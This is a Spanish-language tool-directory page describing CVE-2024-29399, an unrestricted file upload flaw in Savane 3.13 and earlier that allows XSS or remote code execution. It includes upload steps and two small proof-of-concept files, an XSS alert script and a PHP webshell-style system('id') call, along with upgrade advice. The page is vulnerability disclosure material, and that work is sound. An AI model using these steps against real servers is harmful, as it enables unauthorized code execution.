Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-29399 — Referencia CVE-2024-29399 | Kitploit
Herramientas/GitHubGitHub/ally-petitt/cve-2024-29399
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubally-petitt/cve-2024-29399

CVE-2024-29399

Referencia CVE-2024-29399

Ver Repositorio
6hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-29399 Detalles de la Vulnerabilidad

Resumen

En Savane v3.13 y anteriores, la falta de validación en los archivos subidos puede permitir una escalada de privilegios. Los servidores web configurados según las instrucciones de instalación son vulnerables a Cross‑Site Scripting (XSS). En servidores web mal configurados, esto puede llevar a una ejecución remota de código (RCE).

Clasificación CWE: CWE-434: Carga sin restricciones de archivos con tipo peligroso

Reportado por: Ally Petitt

Producto afectado: Savane

Versiones afectadas: 3.13 y anteriores

Pasos de validación

  1. Visite /register/upload.php en el navegador.
  2. Suba un archivo malicioso. Puede ser, entre otros, un archivo HTML o PHP dependiendo de la configuración del servidor web (consulte Resumen). A continuación se muestran ejemplos de ambos:

PoC.html

root@kitploit:~
<script>
  alert("XSS");
</script>

PoC.php

root@kitploit:~
<?php
  echo system("id");
?>
  1. Visite el enlace mostrado al archivo subido para activar la ejecución de código.

Mitigación

Actualice a Savane versión 3.14 o superior. El parche se encuentra aquí.

Descargar herramienta